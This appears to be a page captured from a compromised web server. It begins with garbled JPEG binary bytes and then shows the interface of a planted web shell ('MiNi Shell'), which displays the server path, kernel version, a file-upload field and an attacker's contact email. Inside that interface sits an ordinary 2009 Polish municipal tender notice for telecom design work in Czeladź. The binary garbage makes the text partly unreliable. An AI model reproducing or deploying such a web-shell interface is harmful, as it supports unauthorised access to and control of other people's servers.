JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090813/132909-N-2009.html

<p class="kh_header"><b>Czeladź: Wykonanie dokumentacji technicznej wraz z wymaganymi prawem pozwoleniami  dla projektu
Rozwój społeczeństwa informacyjnego  w Zagłębiu Dąbrowskim - Czeladź</b><br>
<b>Numer ogłoszenia: 132909 - 2009; data zamieszczenia: 13.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czeladź reprezentowana przez Burmistrza , ul. Katowicka 45, 41-250 Czeladź, woj. śląskie, tel. 032 7637923, faks 032 7633694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czeladz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji technicznej wraz z wymaganymi prawem pozwoleniami  dla projektu
Rozwój społeczeństwa informacyjnego  w Zagłębiu Dąbrowskim - Czeladź.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji technicznej wraz z wykonaniem pełnozakresowej i pełnobranżowej dokumentacji projektowej zawierającej projekty budowlane i wykonawcze wchodzących w zakres rozwiązań zadania  Wykonanie dokumentacji technicznej wraz z wymaganymi prawem pozwoleniami  dla projektu Rozwój społeczeństwa informacyjnego w Zagłębiu Dąbrowskim - Czeladź.
Projekt i dokumentacja będące przedmiotem zamówienia dotyczą budowy infrastruktury teleinformatycznej (radiowej) oraz punktów publicznego dostępu do Internetu w następujących lokalizacjach:
1.1. Telecentrum
- ul. Katowicka 4,
- ul. Zwycięstwa 6,
1.2. Hot-spot
- Trznadla 1,
- Rynek (plac),
- Katowicka 45,
- Dehnelów 10,
- Alfreda Biedermanna (kopalnia - obiekt Elektrowni),
1.3. Infokiosk
- Szpitalna 9,
- Rynek,
- 1 Maja 27,
- Handlowa (przystanek),
- Dehnelów 10 (przystanek),
- 35-lecia 1,
- Szpitalna 40,
- 11 Listopada 8,
- Alfreda Biedermanna (wewnątrz),
- Katowicka/Dehnelów (przystanek),
- Francuska /.Nowopogońska,
- Spacerowa,
- Wiejska (przystanek),
- Katowicka 45,
- Szpitalna 3 (przystanek).


	Szczegółowy opis przedmiotu zamówienia zawiera cz. III Specyfikacji Istotnych Warunków Zamówienia (SIWZ) - Instrukcji Dla Wykonawców (IDW).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.21.00.00-3, 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w niniejszym postępowaniu jest wniesienie wadium przez Wykonawcę w wysokości 1300,00 zł (słownie: tysiąc trzysta złotych).
1.1 Wadium musi obejmować okres związania ofertą, tj. 30 dni od upływu terminu  składania ofert. 
1.2 Wadium wnosi się przed upływem terminu składania ofert.
1.3 Wadium może być wniesione w:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym zastrzeżeniem, że poręczenie z kasy musi być poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
1.4 W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.  
1.5 Wadium wnoszone w formie pieniężnej należy wpłacić wyłącznie przelewem na rachunek bankowy:
33 1050 1269 1000 0008 0214 7595


Wadium musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
1.6 Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. 
1.7 Wadium wnoszone w pieniądzu zachowuje ważność przez cały okres jego przechowywania na rachunku bankowym. Wadium wnoszone w formie niepieniężnej musi być ważne co najmniej od dnia, w którym przypada termin składania ofert, do dnia, w którym upływa termin związania ofertą (jeżeli przypada na dzień ustawowo wolny od pracy, to do pierwszego dnia następującego po dniu ustawowo wolnym od pracy).
1.8 Oryginał wadium, wniesionego w formie niepieniężnej łącznie z dyspozycją Wykonawcy o wyłączeniu tegoż dokumentu z oferty po zaistnieniu podstaw do zwrotu wadium ,należy dołączyć do oferty. 
1.9 W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do:  zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
1.10 Zamawiający zatrzymuje wadium, jeżeli zachodzą przesłanki określone w art. 46 ust. 4a i 5 PZP.
1.11 Zwrot wadium następuje wg przepisów PZP.
1.12 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 u.p.z.p., nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1 W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
1.1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (i przedstawią pisemne zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeśli dotyczy) tj.: wykażą, iż:
1.1.2.1. wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, zamówienia odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj.: co najmniej 2 usługi polegające na wykonaniu dokumentacji technicznej  infrastruktury teleinformatycznej dla punktów publicznego dostępu do Internetu, w tym: 
- wymaga się, aby wykonane dokumentacje techniczne obejmowały zaprojektowanie przynajmniej jednego hot-spotu i jednego infokiosku,
- wymaga się aby wartość przynajmniej jednej usługi, dla której Wykonawca opracował dokumentacje techniczną, wynosiła co najmniej 65.000,00 pln brutto,
- wymaga się aby przynajmniej  jedna z inwestycji dla której Wykonawca opracował dokumentacji techniczną dotyczyła systemu, w którym do przesyłania sygnału wykorzystano sieć radiowej transmisji danych,
Zamawiający dopuszcza aby ww. szczegółowe wymagania zostały spełnione w ramach 1 lub 2 wykazanych przez Wykonawcę usług. Wszystkie ww. zamówienia mogą być wykonane w ramach jednego zamówienia

1.1.2.2. dysponują lub będą dysponować minimum 2 osobami posiadającymi uprawnienia wymagane przepisami Prawa budowlanego do pełnienia samodzielnych funkcji technicznych w budownictwie dla Projektanta w specjalności telekomunikacyjnej każda z osób legitymujących się wymaganymi uprawnieniami musi posiadać co najmniej 4 lata doświadczenia zawodowego w tym co najmniej 2 lata doświadczenia jako projektant w swojej specjalności. Osoby wskazane powyżej winny posiadać aktualne uprawnienia budowlane do projektowania w specjalności telekomunikacyjnej bez ograniczeń oraz wykazać aktualną przynależność do właściwej izby samorządu zawodowego, zgodnie z art. 12 ust. 7 Ustawy Prawo budowlane (Dz. U. z 2006r. Nr 156, poz. 1118 z późn. zm.) i posiadać wymagane ubezpieczenie od odpowiedzialności cywilnej. 
1.1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. wykażą: 
1.1.3.1. posiadanie średniego rocznego przychodu w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) w wysokości nie niższej niż 200.000,00 PLN. 
1.1.3.2. posiadanie środków finansowych lub zdolność kredytową do bieżącego finansowania zamówienia na kwotę  nie mniejszą niż 65.000,00 PLN,
1.1.3.3.posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, o wysokości sumy ubezpieczenia (określonej w PLN) nie mniejszej niż 50.000,00 PLN.
1.1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 PZP
1.2 Ocena spełniania warunków udziału w postępowaniu określonych w ppkt 1.1. nastąpi wg systemu spełnia - nie spełnia na podstawie załączonych do oferty: 
oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. Nr 1 lub 1A do Instrukcji dla Wykonawców) oraz 
dokumentów, o których mowa w pkt 6 IDW..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.
2.1 Na podstawie art. 44 PZP, Wykonawca składa wraz z ofertą:
- oświadczenie na podstawie art. 44 PZP o spełnieniu warunków udziału w postępowaniu (zał. nr 1 do IDW), oraz:
2.1.1. w celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 PZP, następujące dokumenty:
2.1.1.1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony(ne) nie wcześniej niż 6 m-cy przed upływem terminu składania ofert,
2.1.2. w celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, następujące dokumenty:
2.1.2.1. wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich odbiorców, przedmiotu łącznie z określeniem wartości (zał. nr 2 do IDW) oraz załączenie dokumentów potwierdzających, że dostawy i usługi zostały wykonane należycie,
2.1.2.2. Wykaz osób po stronie Wykonawcy, które będą uczestniczyły w wykonywaniu zamówienia, posiadających uprawnienia wymagane przepisami Prawa budowlanego do pełnienia samodzielnych funkcji technicznych w budownictwie dla Projektanta w specjalności telekomunikacyjnej (zał. nr 3 do IDW). Do oferty należy dołączyć dokumenty potwierdzające posiadanie wymaganych uprawnień przez w/w osoby (kopie uprawnień potwierdzone za zgodność przez Wykonawcę) oraz dokument potwierdzający ich przynależność do odpowiedniej Izby Samorządu Zawodowego. 

2.1.3. w celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, następujące dokumenty:
2.1.3.1. rachunek zysków i strat (stanowiący część sprawozdanie finansowego), a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego dokumentów określających obroty oraz zobowiązania i należności- za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
2.1.3.2. informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.1.3.3. polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. W przypadku złożenia oferty przez wspólników spółki cywilnej , dokument polisy musi być wystawiony na każdego ze wspólników osobno lub wymieniać w treści wszystkich wspólników spółki cywilnej
2.2 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: 
2.2.1. składają oświadczenie o spełnieniu warunków udziału w postępowaniu (zał. nr 1A do IDW),
2.2.2. oddzielnie wykazują, iż posiadają uprawnienie do wykonywania określonej działalności 
lub czynności oraz nie podlegają wykluczeniu na podstawie art. 24 PZP 
- na potwierdzenie ww. warunku każdy z Wykonawców z osobna składa dokumenty, o których mowa w ppkt 2.1.1. 
2.2.3. wspólnie wykazują, iż: 
2.2.3.1. posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia 
- w celu potwierdzenia ww. warunków Wykonawcy wspólnie przedkładają dokumenty, o których mowa w ppkt 2.1.2.,
2.2.3.2. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- w celu potwierdzenia niniejszego warunku Wykonawca/Wykonawcy składa/ją dokumenty, o których mowa w ppkt 2.1.3. - Zamawiający dopuszcza możliwość, aby wymagane dokumenty złożył tylko ten Wykonawca lub Wykonawcy, którzy spełniają wymagany warunek,
2.2.4. obowiązani są załączyć do oferty oryginał pełnomocnictwa lub notarialnie poświadczoną kopię, zgodnie z którym ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.  
Dokument z którego wynika ustanowienie pełnomocnika musi być podpisany przez osobę (osoby) uprawnioną(e) do reprezentowania z osobna każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z aktualnym odpisem z właściwego rejestru lub zaświadczeniem o wpisie do ewidencji działalności gospodarczej.
2.3 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w ppkt  6.1.1.1), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2.4 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6.3 IDW, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
2.5 Złożenie dokumentów potwierdzających spełnienie warunków udziału w postępowaniu sporządzonych w języku obcym jest dopuszczalne wraz z załączaniem tłumaczenia na język polski, poświadczonego przez osobę (osoby) uprawnioną(e) do reprezentowania Wykonawcy, zgodnie z aktualnym odpisem z właściwego rejestru lub zaświadczeniem o wpisie do ewidencji działalności gospodarczej albo udzielonym pełnomocnictwem. 
2.6 Oświadczenie o spełnieniu warunków udziału w postępowaniu (zał. nr 1 lub 1A do IDW) wykaz wykonanych usług (zał. nr 2 do IDW), wykaz osób (zał. nr 3 do IDW) oraz Karta Ofertowa (zał. nr 4 do IDW) muszą być podpisane przez osobę (osoby) uprawnioną(e) do reprezentowania Wykonawcy, zgodnie z aktualnym odpisem z właściwego rejestru lub zaświadczeniem o wpisie do ewidencji działalności gospodarczej albo udzielonym pełnomocnictwem. 
2.7 Dokumenty, o których mowa w pkt 6 IDW należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem podpisem i pieczęcią imienną osoby (osób) uprawnionej(ych) do reprezentowania Wykonawcy, zgodnie z aktualnym odpisem z właściwego rejestru lub zaświadczeniem o wpisie do ewidencji działalności gospodarczej albo udzielonym pełnomocnictwem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.czeladz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> mskiba@um.czeladz.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2009 godzina 09:00, miejsce: Kancelaria Urzędu Miasta Czeladź, ul. Katowicka 45, pokój 118.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com